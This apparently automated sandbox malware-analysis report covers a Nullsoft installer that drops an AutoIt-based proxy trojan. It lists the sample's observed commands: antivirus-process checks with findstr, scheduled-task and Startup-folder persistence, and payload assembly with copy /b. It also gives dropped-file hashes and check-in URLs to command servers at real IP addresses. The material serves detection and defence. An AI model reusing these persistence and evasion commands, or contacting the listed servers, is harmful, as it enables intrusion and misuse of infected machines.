| File name: | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862 |
| Full analysis: | https://app.any.run/tasks/db3a8f53-9d90-4b64-8860-a4f8cdbde221 |
| Verdict: | Malicious activity |
| Analysis date: | May 31, 2024, 01:11:33 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
| MD5: | 2DEB7F86FD7F7B78FE5FD1885442F761 |
| SHA1: | F52F6AE76362CEEBBF54968B2465F5CBDB8D2227 |
| SHA256: | 2A9FFEA0C1F0F96E06F649AB7F045BA8EF2B9C6CA4DEE721A54B3C439D998862 |
| SSDEEP: | 98304:cMD+P0APWlL/cQBEf41atmJB/bpPET4bB18xZWO6u8NAcxoZf1dlTFnSQxnl+Hh/:9970ObFa2X |
MALICIOUS
Drops the executable file immediately after the start
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- cmd.exe (PID: 4016)
- Soa.pif (PID: 2024)
Antivirus name has been found in the command line (generic signature)
- findstr.exe (PID: 864)
- findstr.exe (PID: 4048)
Uses Task Scheduler to run other applications
- cmd.exe (PID: 1292)
Create files in the Startup directory
- cmd.exe (PID: 1772)
SUSPICIOUS
Application launched itself
- cmd.exe (PID: 4016)
Starts CMD.EXE for commands execution
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- cmd.exe (PID: 4016)
Drops a file with a rarely used extension (PIF)
- cmd.exe (PID: 4016)
- Soa.pif (PID: 2024)
Get information on the list of running processes
- cmd.exe (PID: 4016)
Reads security settings of Internet Explorer
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
Executing commands from ".cmd" file
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
Executable content was dropped or overwritten
- cmd.exe (PID: 4016)
- Soa.pif (PID: 2024)
Using 'findstr.exe' to search for text patterns in files and output
- cmd.exe (PID: 4016)
Reads the Internet Settings
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
Suspicious file concatenation
- cmd.exe (PID: 1876)
Starts application with an unusual extension
- cmd.exe (PID: 4016)
- wscript.exe (PID: 2280)
The executable file from the user directory is run by the CMD process
- Soa.pif (PID: 2024)
Runs PING.EXE to delay simulation
- cmd.exe (PID: 4016)
Connects to unusual port
- Soa.pif (PID: 1664)
Runs shell command (SCRIPT)
- wscript.exe (PID: 2280)
The process executes via Task Scheduler
- wscript.exe (PID: 2280)
INFO
Checks supported languages
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
- wmpnscfg.exe (PID: 2052)
- Soa.pif (PID: 1664)
- SnakeLink.pif (PID: 2268)
Reads the computer name
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
- wmpnscfg.exe (PID: 2052)
Creates files or folders in the user directory
- 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe (PID: 3984)
- Soa.pif (PID: 2024)
Reads mouse settings
- Soa.pif (PID: 2024)
- SnakeLink.pif (PID: 2268)
Manual execution by a user
- cmd.exe (PID: 1292)
- cmd.exe (PID: 1772)
- Soa.pif (PID: 1664)
- wmpnscfg.exe (PID: 2052)
Create files in a temporary directory
- Soa.pif (PID: 1664)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .exe | | | Win32 Executable MS Visual C++ (generic) (42.2) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (37.3) |
| .dll | | | Win32 Dynamic Link Library (generic) (8.8) |
| .exe | | | Win32 Executable (generic) (6) |
| .exe | | | Generic Win/DOS Executable (2.7) |
EXIF
EXE
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2020:08:01 02:42:47+00:00 |
| ImageFileCharacteristics: | No relocs, Executable, No line numbers, No symbols, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 6 |
| CodeSize: | 25088 |
| InitializedDataSize: | 119296 |
| UninitializedDataSize: | 1024 |
| EntryPoint: | 0x3312 |
| OSVersion: | 4 |
| ImageVersion: | 6 |
| SubsystemVersion: | 4 |
| Subsystem: | Windows GUI |
| FileVersionNumber: | 2.1.0.0 |
| ProductVersionNumber: | 2.1.0.0 |
| FileFlagsMask: | 0x003f |
| FileFlags: | (none) |
| FileOS: | Win32 |
| ObjectFileType: | Executable application |
| FileSubtype: | - |
| LanguageCode: | Neutral |
| CharacterSet: | Unicode |
| CompanyName: | DevEnterprise Software |
| FileDescription: | DevEnterprise.DirectoryMonitor.Setup.IstallHelper |
| FileVersion: | 2.1.0.0 |
| ProductVersion: | 2.1.0.0 |
| AssemblyVersion: | 2.1.0.0 |
Total processes
53
Monitored processes
18
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 328 | ping -n 5 127.0.0.1 | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 864 | findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1292 | cmd /c schtasks.exe /create /tn "Squirt" /tr "wscript //B 'C:\Users\admin\AppData\Local\LinkGuard Dynamics\SnakeLink.js'" /sc minute /mo 5 /F | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1664 | "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\4461264\Soa.pif" | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\4461264\Soa.pif | explorer.exe | ||||||||||||
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Version: 3, 3, 14, 2 Modules
| |||||||||||||||
| 1772 | cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SnakeLink.url" & echo URL="C:\Users\admin\AppData\Local\LinkGuard Dynamics\SnakeLink.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SnakeLink.url" & exit | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1876 | cmd /c copy /b Begin + Predict + Forth + Failing + Totally + Accreditation + Quest + Textbooks + Reality + Competing + Moon + Enabled + Everyone + Mile + Verse + Dramatically + Link + Cindy + Speech + Hardcore + Adjustments + Eligible + Abc + Academy + Came + Basement + Island + Sagem + Smaller + Wild + Part + Ray + Listings + Stuff + Mpg + Indonesian + Computational + Edt + Lending + Monkey + Id + Displays + Monte + Hence 4461264\K | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2024 | 4461264\Soa.pif 4461264\K | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\4461264\Soa.pif | cmd.exe | ||||||||||||
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Version: 3, 3, 14, 2 Modules
| |||||||||||||||
| 2040 | findstr /V "SHEERFAIRLYCAMCORDERENEMIES" Marine | C:\Windows\System32\findstr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2052 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2108 | tasklist | C:\Windows\System32\tasklist.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Lists the current running tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
Total events
4 185
Read events
4 177
Write events
8
Delete events
0
Modification events
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3984) 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
Executable files
2
Suspicious files
65
Text files
4
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Stuff | binary | |
MD5:D90F6FDD89467A5AF4714687EFCFA32E | SHA256:6860A6BF6CBB73785C485645CBC86D6D4FC38FAE1A1E02797AB69029B24CF90B | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Lending | binary | |
MD5:1B414AADBD28819DC35C480F5FFC76B6 | SHA256:3BF769CBF8CCAC131F2D270F0EAA014F1FEA037F80DDC62997C514C92DE797F2 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Takes | binary | |
MD5:76EFE6A721D142BB0C93A0C7D3913332 | SHA256:ECB0952FE51F9C04042555371416E3677C068D6FAC51ACA9E7970D7FFABA2EE5 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Everyone | binary | |
MD5:D55C96313B79536A45CE2CAF4ACF1ECE | SHA256:489EB2FE92D6C1F78486CC18BFF072771FC982E6EDA68522AF990E3E927246C1 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Cube | binary | |
MD5:A011BBEFE9A50CCBF9C4DE483B3EF11C | SHA256:5215396DC0AD536537584E1998191576900BD0FE6AC96691212799F567A9D3A2 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Enabled | binary | |
MD5:D3ED6E150935F812A7A8FAF2CE2EC71A | SHA256:933441802ECAA146824C1D3282F1F2EF74F69208D7EE16019E12B15040FA0849 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Monte | binary | |
MD5:706708698DFA48C5AB83C197B7B1A804 | SHA256:EB3E876F8613FE9162C052521CF36A465D453F37B751711C37C1429DB5113897 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Help | text | |
MD5:412C1FEB45FE14AFD85422157E4AA220 | SHA256:50C148BF081F0E611011C6E32F6320C8EA49A7FE37F8052158D0C4928C67BE77 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Latinas | binary | |
MD5:32EF3F3EE3202B8E09009F9619BE8225 | SHA256:B9E02C619C640C4729355DD419E9FDAF77B7D20FCD0AE18FE8E11BE62B7B7C92 | |||
| 3984 | 2a9ffea0c1f0f96e06f649ab7f045ba8ef2b9c6ca4dee721a54b3c439d998862.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Marine | binary | |
MD5:5F73F76F66973876FAC4DE7B5D4B5A0E | SHA256:D61C900B520353FBFBCB8B5332FBB5C1A805D175CE459781A1DDA307855F3030 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
9
DNS requests
1
Threats
13
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1664 | Soa.pif | GET | 429 | 195.2.70.38:30001 | http://195.2.70.38:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF | unknown | — | — | unknown |
1664 | Soa.pif | GET | 429 | 91.142.74.28:30001 | http://91.142.74.28:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF | unknown | — | — | unknown |
1664 | Soa.pif | GET | 200 | 77.238.224.56:30001 | http://77.238.224.56:30001/api/helper-first-register?buildVersion=0D14.gjm2oNi&md5=b06e67f9767e5023892d9698703ad098&proxyPassword=lzuMLKyh&proxyUsername=5Vx2nN8C&userId=mXE0iIPukTkyydhF | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1664 | Soa.pif | 195.2.70.38:30001 | — | Hosting technology LTD | RU | unknown |
1664 | Soa.pif | 91.142.74.28:30001 | — | VIP-TELECOM-SERVICE Ltd. | RU | unknown |
1664 | Soa.pif | 77.238.245.11:30001 | — | Tele.RU Ltd. | RU | unknown |
1664 | Soa.pif | 77.238.224.56:30001 | — | Tele.RU Ltd. | RU | unknown |
1664 | Soa.pif | 91.142.73.198:14930 | — | VIP-TELECOM-SERVICE Ltd. | RU | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
oIisZULlamRX.oIisZULlamRX |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | A Network Trojan was detected | PROXY [ANY.RUN] GoProxy Check-in |
— | — | A Network Trojan was detected | PROXY [ANY.RUN] GoProxy Check-in |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | A Network Trojan was detected | PROXY [ANY.RUN] GoProxy Check-in |
7 ETPRO signatures available at the full report